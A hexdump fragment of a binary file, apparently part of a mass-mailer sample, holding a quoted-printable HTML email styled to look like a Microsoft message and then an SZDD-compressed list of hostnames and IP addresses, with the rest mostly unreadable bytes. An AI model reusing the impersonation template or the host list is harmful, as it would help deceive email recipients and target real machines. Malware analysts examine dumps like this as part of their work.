000180b0  61 69 6c 20 61 64 64 72  65 73 73 20 61 6e 64 20  |ail address and |
000180c0  77 65 20 61 72 65 20 75  6e 61 62 6c 65 20 3d 0d  |we are unable =.|
000180d0  0a 74 6f 20 72 65 73 70  6f 6e 64 20 74 6f 20 61  |.to respond to a|
000180e0  6e 79 20 72 65 70 6c 69  65 73 2e 0d 0a 0d 0a 2d  |ny replies.....-|
000180f0  2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  |----------------|
*
00018110  2d 2d 2d 2d 2d 2d 2d 2d  2d 2d 2d 2d 2d 0d 0a 54  |-------------..T|
00018120  68 65 20 6e 61 6d 65 73  20 6f 66 20 74 68 65 20  |he names of the |
00018130  61 63 74 75 61 6c 20 63  6f 6d 70 61 6e 69 65 73  |actual companies|
00018140  20 61 6e 64 20 70 72 6f  64 75 63 74 73 20 6d 65  | and products me|
00018150  6e 74 69 6f 6e 65 64 20  3d 0d 0a 68 65 72 65 69  |ntioned =..herei|
00018160  6e 20 61 72 65 20 74 68  65 20 74 72 61 64 65 6d  |n are the tradem|
00018170  61 72 6b 73 20 6f 66 20  74 68 65 69 72 20 72 65  |arks of their re|
00018180  73 70 65 63 74 69 76 65  20 6f 77 6e 65 72 73 2e  |spective owners.|
00018190  0d 0a 00 00 00 00 00 00  3c 48 54 4d 4c 3e 0d 0a  |........<HTML>..|
000181a0  3c 48 45 41 44 3e 0d 0a  3c 73 74 79 6c 65 20 74  |<HEAD>..<style t|
000181b0  79 70 65 3d 33 44 27 74  65 78 74 2f 63 73 73 27  |ype=3D'text/css'|
000181c0  3e 2e 6e 61 76 74 65 78  74 7b 63 6f 6c 6f 72 3a  |>.navtext{color:|
000181d0  23 66 66 66 66 66 66 3b  74 65 78 74 2d 64 65 63  |#ffffff;text-dec|
000181e0  6f 72 61 74 69 6f 6e 3a  6e 6f 6e 65 7d 0d 0a 3c  |oration:none}..<|
000181f0  2f 73 74 79 6c 65 3e 0d  0a 3c 2f 48 45 41 44 3e  |/style>..</HEAD>|
00018200  0d 0a 0d 0a 3c 42 4f 44  59 20 42 47 43 4f 4c 4f  |....<BODY BGCOLO|
00018210  52 3d 33 44 22 57 68 69  74 65 22 20 54 45 58 54  |R=3D"White" TEXT|
00018220  3d 33 44 22 42 6c 61 63  6b 22 3e 0d 0a 3c 42 41  |=3D"Black">..<BA|
00018230  53 45 46 4f 4e 54 20 53  49 5a 45 3d 33 44 22 32  |SEFONT SIZE=3D"2|
00018240  22 20 66 61 63 65 3d 33  44 22 76 65 72 64 61 6e  |" face=3D"verdan|
00018250  61 2c 61 72 69 61 6c 22  3e 0d 0a 3c 54 41 42 4c  |a,arial">..<TABL|
00018260  45 20 57 49 44 54 48 3d  33 44 22 36 30 30 22 20  |E WIDTH=3D"600" |
00018270  48 45 49 47 48 54 3d 33  44 22 34 30 22 20 42 47  |HEIGHT=3D"40" BG|
00018280  43 4f 4c 4f 52 3d 33 44  22 23 31 34 37 38 45 42  |COLOR=3D"#1478EB|
00018290  22 3e 0d 0a 3c 54 52 20  68 65 69 67 68 74 3d 33  |">..<TR height=3|
000182a0  44 22 32 30 22 3e 0d 0a  3c 54 44 20 41 4c 49 47  |D"20">..<TD ALIG|
000182b0  4e 3d 33 44 22 6c 65 66  74 22 20 56 41 4c 49 47  |N=3D"left" VALIG|
000182c0  4e 3d 33 44 22 54 4f 50  22 20 57 49 44 54 48 3d  |N=3D"TOP" WIDTH=|
000182d0  33 44 22 34 30 30 22 20  52 4f 57 53 50 41 4e 3d  |3D"400" ROWSPAN=|
000182e0  33 44 22 32 22 3e 26 6e  62 73 70 3b 0d 0a 3c 46  |3D"2">&nbsp;..<F|
000182f0  4f 4e 54 20 46 41 43 45  3d 33 44 22 73 61 6e 73  |ONT FACE=3D"sans|
00018300  2d 73 65 72 69 66 22 20  53 49 5a 45 3d 33 44 22  |-serif" SIZE=3D"|
00018310  35 22 3e 3c 49 3e 3c 42  3e 0d 0a 3c 41 20 63 6c  |5"><I><B>..<A cl|
00018320  61 73 73 3d 33 44 27 6e  61 76 74 65 78 74 27 20  |ass=3D'navtext' |
00018330  48 52 45 46 3d 33 44 22  68 74 74 70 3a 2f 2f 77  |HREF=3D"http://w|
00018340  77 77 2e 6d 69 63 72 6f  73 6f 66 74 2e 63 6f 6d  |ww.microsoft.com|
00018350  2f 22 0d 0a 54 49 54 4c  45 3d 33 44 22 4d 69 63  |/"..TITLE=3D"Mic|
00018360  72 6f 73 6f 66 74 20 48  6f 6d 65 20 53 69 74 65  |rosoft Home Site|
00018370  22 20 74 61 72 67 65 74  3d 33 44 22 5f 74 6f 70  |" target=3D"_top|
00018380  22 3e 4d 69 63 72 6f 73  6f 66 74 3c 2f 41 3e 0d  |">Microsoft</A>.|
00018390  0a 3c 2f 42 3e 3c 2f 49  3e 3c 2f 46 4f 4e 54 3e  |.</B></I></FONT>|
000183a0  0d 0a 3c 2f 54 44 3e 0d  0a 0d 0a 3c 54 44 20 41  |..</TD>....<TD A|
000183b0  4c 49 47 4e 3d 33 44 22  72 69 67 68 74 22 20 56  |LIGN=3D"right" V|
000183c0  41 4c 49 47 4e 3d 33 44  22 4d 49 44 44 4c 45 22  |ALIGN=3D"MIDDLE"|
000183d0  20 42 47 43 4f 4c 4f 52  3d 33 44 22 42 6c 61 63  | BGCOLOR=3D"Blac|
000183e0  6b 22 20 4e 4f 57 52 41  50 3e 0d 0a 3c 46 4f 4e  |k" NOWRAP>..<FON|
000183f0  54 20 63 6f 6c 6f 72 3d  33 44 22 23 66 66 66 66  |T color=3D"#ffff|
00018400  66 66 22 20 73 69 7a 65  3d 33 44 31 3e 26 6e 62  |ff" size=3D1>&nb|
00018410  73 70 3b 0d 0a 3c 41 20  63 6c 61 73 73 3d 33 44  |sp;..<A class=3D|
00018420  27 6e 61 76 74 65 78 74  27 20 68 72 65 66 3d 33  |'navtext' href=3|
00018430  44 27 68 74 74 70 3a 2f  2f 77 77 77 2e 6d 69 63  |D'http://www.mic|
00018440  72 6f 73 6f 66 74 2e 63  6f 6d 2f 63 61 74 61 6c  |rosoft.com/catal|
00018450  6f 67 2f 27 20 3d 0d 0a  74 61 72 67 65 74 3d 33  |og/' =..target=3|
00018460  44 22 5f 74 6f 70 22 3e  41 6c 6c 20 50 72 6f 64  |D"_top">All Prod|
00018470  75 63 74 73 3c 2f 41 3e  26 6e 62 73 70 3b 7c 26  |ucts</A>&nbsp;|&|
00018480  6e 62 73 70 3b 0d 0a 3c  41 20 63 6c 61 73 73 3d  |nbsp;..<A class=|
00018490  33 44 27 6e 61 76 74 65  78 74 27 20 68 72 65 66  |3D'navtext' href|
000184a0  3d 33 44 27 68 74 74 70  3a 2f 2f 73 75 70 70 6f  |=3D'http://suppo|
000184b0  72 74 2e 6d 69 63 72 6f  73 6f 66 74 2e 63 6f 6d  |rt.microsoft.com|
000184c0  2f 27 20 3d 0d 0a 74 61  72 67 65 74 3d 33 44 22  |/' =..target=3D"|
000184d0  5f 74 6f 70 22 3e 53 75  70 70 6f 72 74 3c 2f 41  |_top">Support</A|
000184e0  3e 26 6e 62 73 70 3b 7c  26 6e 62 73 70 3b 0d 0a  |>&nbsp;|&nbsp;..|
000184f0  3c 41 20 63 6c 61 73 73  3d 33 44 27 6e 61 76 74  |<A class=3D'navt|
00018500  65 78 74 27 20 68 72 65  66 3d 33 44 27 68 74 74  |ext' href=3D'htt|
00018510  70 3a 2f 2f 73 65 61 72  63 68 2e 6d 69 63 72 6f  |p://search.micro|
00018520  73 6f 66 74 2e 63 6f 6d  2f 27 20 3d 0d 0a 74 61  |soft.com/' =..ta|
00018530  72 67 65 74 3d 33 44 22  5f 74 6f 70 22 3e 53 65  |rget=3D"_top">Se|
00018540  61 72 63 68 3c 2f 41 3e  26 6e 62 73 70 3b 7c 26  |arch</A>&nbsp;|&|
00018550  6e 62 73 70 3b 0d 0a 3c  41 20 63 6c 61 73 73 3d  |nbsp;..<A class=|
00018560  33 44 27 6e 61 76 74 65  78 74 27 20 68 72 65 66  |3D'navtext' href|
00018570  3d 33 44 27 68 74 74 70  3a 2f 2f 77 77 77 2e 6d  |=3D'http://www.m|
00018580  69 63 72 6f 73 6f 66 74  2e 63 6f 6d 2f 27 20 74  |icrosoft.com/' t|
00018590  61 72 67 65 74 3d 33 44  5f 74 6f 70 3e 0d 0a 4d  |arget=3D_top>..M|
000185a0  69 63 72 6f 73 6f 66 74  2e 63 6f 6d 20 47 75 69  |icrosoft.com Gui|
000185b0  64 65 3c 2f 41 3e 26 6e  62 73 70 3b 0d 0a 3c 2f  |de</A>&nbsp;..</|
000185c0  46 4f 4e 54 3e 0d 0a 3c  2f 54 44 3e 0d 0a 3c 2f  |FONT>..</TD>..</|
000185d0  54 52 3e 0d 0a 0d 0a 3c  54 52 3e 0d 0a 3c 54 44  |TR>....<TR>..<TD|
000185e0  20 41 4c 49 47 4e 3d 33  44 22 72 69 67 68 74 22  | ALIGN=3D"right"|
000185f0  20 56 41 4c 49 47 4e 3d  33 44 22 42 4f 54 54 4f  | VALIGN=3D"BOTTO|
00018600  4d 22 20 4e 4f 57 52 41  50 3e 0d 0a 3c 46 4f 4e  |M" NOWRAP>..<FON|
00018610  54 20 46 41 43 45 3d 33  44 22 56 65 72 64 61 6e  |T FACE=3D"Verdan|
00018620  61 2c 20 41 72 69 61 6c  22 20 53 49 5a 45 3d 33  |a, Arial" SIZE=3|
00018630  44 31 3e 3c 42 3e 0d 0a  3c 41 20 63 6c 61 73 73  |D1><B>..<A class|
00018640  3d 33 44 27 6e 61 76 74  65 78 74 27 20 48 52 45  |=3D'navtext' HRE|
00018650  46 3d 33 44 27 68 74 74  70 3a 2f 2f 77 77 77 2e  |F=3D'http://www.|
00018660  6d 69 63 72 6f 73 6f 66  74 2e 63 6f 6d 2f 27 20  |microsoft.com/' |
00018670  54 41 52 47 45 54 3d 33  44 22 20 74 6f 70 22 3e  |TARGET=3D" top">|
00018680  0d 0a 4d 69 63 72 6f 73  6f 66 74 20 48 6f 6d 65  |..Microsoft Home|
00018690  3c 2f 41 3e 26 6e 62 73  70 3b 26 6e 62 73 70 3b  |</A>&nbsp;&nbsp;|
000186a0  3c 2f 42 3e 0d 0a 3c 2f  46 4f 4e 54 3e 0d 0a 3c  |</B>..</FONT>..<|
000186b0  2f 54 44 3e 0d 0a 3c 2f  54 52 3e 0d 0a 3c 2f 54  |/TD>..</TR>..</T|
000186c0  41 42 4c 45 3e 0d 0a 0d  0a 26 6e 62 73 70 3b 3c  |ABLE>....&nbsp;<|
000186d0  49 4d 47 20 53 52 43 3d  33 44 22 63 69 64 3a 35  |IMG SRC=3D"cid:5|
000186e0  38 39 37 34 32 31 22 20  42 4f 52 44 45 52 3d 33  |897421" BORDER=3|
000186f0  44 22 30 22 3e 3c 42 52  3e 3c 42 52 3e 0d 0a 3c  |D"0"><BR><BR>..<|
00018700  54 41 42 4c 45 20 57 49  44 54 48 3d 33 44 22 36  |TABLE WIDTH=3D"6|
00018710  30 30 22 3e 3c 54 52 3e  3c 54 44 3e 3c 46 4f 4e  |00"><TR><TD><FON|
00018720  54 20 53 49 5a 45 3d 33  44 22 32 22 3e 0d 0a 00  |T SIZE=3D"2">...|
00018730  53 5a 44 44 88 f0 27 33  41 00 4b 1b 00 00 ff 30  |SZDD..'3A.K....0|
00018740  2e 61 62 6e 6f 72 6d ff  61 6c 2e 63 6f 6d 0d 0a  |.abnorm.al.com..|
00018750  df 31 32 2d 32 35 01 00  30 32 ff 2d 36 32 2e 63  |.12-25..02.-62.c|
00018760  6c 69 65 ff 6e 74 2e 61  74 74 62 69 fe fa f8 34  |lie.nt.attbi...4|
00018770  2d 31 30 37 2d 39 fc 0d  0d fd f1 34 30 2e 31 30  |-107-9.....40.10|
00018780  39 bf 2e 31 33 2e 31 37  3d 01 31 eb 2e 34 51 01  |9..13.17=.1..4Q.|
00018790  35 4c 04 34 2e 32 ef 31  2e 37 30 3d 01 32 2e 31  |5L.4.2.1.70=.2.1|
000187a0  ff 35 35 2e 31 32 39 2e  34 fe fe f0 36 31 2e 35  |.55.129.4...61.5|
000187b0  33 2e 32 f7 2e 36 36 75  01 35 2e 38 34 f3 2e 31  |3.2..66u.5.84..1|
000187c0  6f 00 fe f0 39 32 2e 38  ee 48 01 33 2e 36 65 01  |o...92.8.H.3.6e.|
000187d0  39 33 2e 7f 35 34 2e 37  36 2e 33 57 01 5d 39 89  |93..54.76.3W.]9.|
000187e0  00 33 33 2e b3 00 31 9d  02 9a 5f 00 30 89 00 38  |.33...1..._.0..8|
[....]
00019760  07 a5 a2 30 35 32 0e aa  ad 77 77 2e 61 f0 0c 80  |...052..-ww.a...|
00019770  78 d0 fa 11 3e d0 a1 66  6f 63 61 6c 24 d6 d0 a1  |x...>..focal$...|
00019780  60 d8 70 6e 40 25 70 8a  a2 d1 a0 75 73 f2 62 da  |`.pn@%p....us.b.|
00019790  bd 31 79 6f c0 6f 77 db  69 79 75 08 45 c0 61 f0  |.1yo.ow.iyu.E.a.|
000197a0  4f a1 63 9b 63 e2 60 00  00 00 00 00 00 00 00 00  |O.c.c.`.........|
000197b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0001a000